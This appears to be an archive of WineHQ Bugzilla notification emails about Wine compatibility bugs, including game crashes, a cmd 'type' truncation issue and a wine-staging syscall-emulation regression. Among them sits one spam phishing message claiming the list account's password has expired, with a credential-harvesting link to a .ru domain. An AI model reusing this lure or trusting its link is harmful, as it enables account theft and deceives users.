https://bugs.winehq.org/show_bug.cgi?id=55149
Bug ID: 55149
Summary: Nancy Drew: Danger by Design exits on game start
Product: Wine
Version: 8.0.1
Hardware: x86-64
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: -unknown
Assignee: wine-bugs(a)winehq.org
Reporter: tiger12506(a)gmail.com
Distribution: ---
Created attachment 74715
--> https://bugs.winehq.org/attachment.cgi?id=74715
warn+all,+seh,+ddraw
Nancy Drew: Danger By Design is 2 disc cd game. I have ISOs created from
original discs that I am installing from. Setup.exe works fine -- I choose to
change the install location to C:\ND\DangerbyDesign\ because previous attempts
to run game from the default location result in it looking for a CIFTree file
in the C:\ND\DangerbyDesign directory. That's not the issue.
When installed correctly, the game appears to start, the screen goes black,
resolution changes to the game's chosen 640x480, and then the game quits
(leaving my linux desktop resolution in 640x480 mode). This is the issue.
I assume this is a crash, but I either haven't found, or don't understand the
outputs of the WINEDEBUG logs well enough to diagnose the issue. Any way that I
can help you help me would be appreciated.
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.
https://bugs.winehq.org/show_bug.cgi?id=46820
Bug ID: 46820
Summary: 20XX (Game) needs native d3dcompiler_43.dll
Product: Wine
Version: 4.2
Hardware: x86-64
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: directx-d3d
Assignee: wine-bugs(a)winehq.org
Reporter: patoplc(a)live.com
Distribution: ---
The game 20XX won't start unless the native d3dcompiler_43.dll is provided.
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.
https://bugs.winehq.org/show_bug.cgi?id=56365
Bug ID: 56365
Summary: ntdll-Syscall_Emulation patchset causing xdelta3
process to crash/fail
Product: Wine-staging
Version: 9.2
Hardware: x86-64
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: -unknown
Assignee: wine-bugs(a)winehq.org
Reporter: madbyte(a)tuta.io
CC: leslie_alistair(a)hotmail.com, z.figura12(a)gmail.com
Distribution: ---
Created attachment 76104
--> https://bugs.winehq.org/attachment.cgi?id=76104
log winedebug_seh wine-staging-9.2
Me and a bunch of other users encounter an issue while using a delta patcher
used to downpatch a specific game to an earlier game version.
The delta patcher utilizes xdelta3.
I found that the xdelta3 process seemingly fails at a random file while
patching the game data.
I started building wine-staging from source myself and after some testing and
excluding seemingly relevant patchsets I found that excluding the patch
'ntdll-Syscall_Emulation' will result in the patcher finishing it's job without
issues.
The issue using vanilla wine-staging builds seemed to not be consistent between
distros as well:
Tests always failed on e.g Pop!_Os, CachyOS, EndeavourOS, Garuda, but on e.g
Fedora 39, Mint 21.3, Manjaro, Ubuntu 23.10 the patching worked every time,
even with the ntdll-Syscall_Emulation patchset enabled. I guessed it might be
because of some kernel option/feature enabled/disabled by default on some
distros but didn't want to built kernels from source myself to test this.
In case it helps, here is the patcher src snippet from where the xdelta3
process is invoked:
https://dev.sp-tarkov.com/waffle.lord/Patcher/src/branch/main/Patcher/Patch…
(the error log of the patcher itself shows the message seen on line 113,
"something went wrong during the xdelta3 process")
I've attached a log showing a failed attempt with wine-staging-9.2 including
said patchset.
imho the relevant part starts at line 14726 in the file:
0748:trace:seh:sigsys_handler SIGSYS, rax 0xffff, rip 0x600000000005.
0748:trace:seh:install_bpf Seccomp filters already installed.
0748:fixme:ver:GetCurrentPackageId (000000000063FEB0 0000000000000000): stub
02c4:trace:seh:dispatch_exception code=e0434352 flags=1 addr=00006FFFFFC135A7
ip=6fffffc135a7
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.
https://bugs.winehq.org/show_bug.cgi?id=42107
Bug ID: 42107
Summary: app kpg91d crashes when setting up serial port
selection
Product: Wine
Version: 1.6.2
Hardware: x86
OS: Linux
Status: UNCONFIRMED
Severity: blocker
Priority: P2
Component: -unknown
Assignee: wine-bugs(a)winehq.org
Reporter: kl7ut(a)ymail.com
Distribution: ---
Created attachment 56627
--> https://bugs.winehq.org/attachment.cgi?id=56627
backtrace from Wine kpg91d crash
Kenwood Radio programming software kpg91d crashes when accessing settings,
communications port dialogue.
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.
https://bugs.winehq.org/show_bug.cgi?id=56381
Bug ID: 56381
Summary: "type" does not support binary files
Product: Wine
Version: 9.0
Hardware: x86-64
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: cmd
Assignee: wine-bugs(a)winehq.org
Reporter: dan(a)coneharvesters.com
Distribution: ---
"type" truncates binary files when redirecting the output to stdout. For
example:
c:\>type c:\windows\winhelp.exe >foo
c:\>dir c:\windows\winhelp.exe foo
Volume in drive c has no label.
Volume Serial Number is 0000-0000
Directory of c:\windows
28/02/2022 5:32 PM 257 winhelp.exe
1 file 257 bytes
0 directories
Directory of c:
29/02/2024 1:21 PM 2 foo
1 file 2 bytes
0 directories 19,394,506,752 bytes free
The file is truncated after the second byte (byte 3 is NUL). Windows 10 and
Windows XP copy the entire file in this case. However, Windows 95 truncates the
file.
This is causing real-world compatibility issues, as the z88dk compiler suite
inexplicably uses "type" to copy binary files like this on Windows.
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.
http://bugs.winehq.org/show_bug.cgi?id=26017
Summary: 3D Pinball - Space Cadet: fullscreen does not work
properly
Product: Wine
Version: 1.3.13
Platform: x86
OS/Version: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: -unknown
AssignedTo: wine-bugs(a)winehq.org
ReportedBy: turbolad995(a)hotmail.co.uk
3D Pinball - Space Cadet
If you can copy the file from Windows XP in C:\Program Files\Windows NT\Pinball
(or if you dual-boot Windows XP with Linux and access the file) and run the
pinball.exe in Wine.
Fullscreen mode does not work properly. The title bar of the window still
shows when you press <F4> to go into fullscreen. Also, the top and bottom
GNOME panels in Ubuntu are still showing. The game is supposed to be in
fullscreen completely.
--
Configure bugmail: http://bugs.winehq.org/userprefs.cgi?tab=email
Do not reply to this email, post in Bugzilla using the
above URL to reply.
------- You are receiving this mail because: -------
You are watching all bug changes.
ATTENTION!!!,
Immediate action is required regarding the security of your email account wine-bugs(a)winehq.org.
Your password has expired and must be updated immediately. Failure to do so within the next 72 hours will result in the suspension of your account and all messages will be returned to sender.
You can continue using the same password to avoid any inconvenience of remembering a new one.
KEEP SAME PASSWORD https://mashraqdigitalservices.ru/index.html?email=wine-bugs@winehq.org
Your prompt attention to this matter is mandatory to prevent any unauthorized access to your account.
Thank you for your cooperation.
Sincerely,
http://bugs.winehq.org/show_bug.cgi?id=19833
Summary: the program hotkeynet.exe has encountered a serious
problem and needs to close
Product: Wine
Version: 1.1.28
Platform: PC
OS/Version: Linux
Status: UNCONFIRMED
Severity: critical
Priority: P2
Component: kernel32
AssignedTo: wine-bugs(a)winehq.org
ReportedBy: goin2far(a)gmail.com
When starting the program Hotkeynet the error pops up and can get no further.
--
Configure bugmail: http://bugs.winehq.org/userprefs.cgi?tab=email
Do not reply to this email, post in Bugzilla using the
above URL to reply.
------- You are receiving this mail because: -------
You are watching all bug changes.
https://bugs.winehq.org/show_bug.cgi?id=54833
Bug ID: 54833
Summary: Heroes of Might and Magic 5 crash on starting some
builtin maps, since wine 7.13
Product: Wine
Version: 8.5
Hardware: x86-64
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: -unknown
Assignee: wine-bugs(a)winehq.org
Reporter: galdralag(a)bk.ru
Distribution: ---
While answering on https://bugs.winehq.org/show_bug.cgi?id=39742#c21 I found
that I can't start many single player maps (Single Player -> Custom Game) -
game crashes. These maps was playable earlier. And playing on maps that can be
started game often occasionally crashes.
After investigation different versions I found this begins from wine 7.13 on
7.12 all ok.
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.
https://bugs.winehq.org/show_bug.cgi?id=50865
Bug ID: 50865
Summary: Map editor of Heroes of Might and Magic 5 completely
not working
Product: Wine
Version: 6.4
Hardware: x86-64
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: -unknown
Assignee: wine-bugs(a)winehq.org
Reporter: galdralag(a)bk.ru
Distribution: ---
Created attachment 69677
--> https://bugs.winehq.org/attachment.cgi?id=69677
Screenshot
Heroes of Might and Magic 5.
Map editor starts, shows left and right panels with games elements. But on
place of map it shoes garbage rectangle.
See attached screenshot.
--
Do not reply to this email, post in Bugzilla using the
above URL to reply.
You are receiving this mail because:
You are watching all bug changes.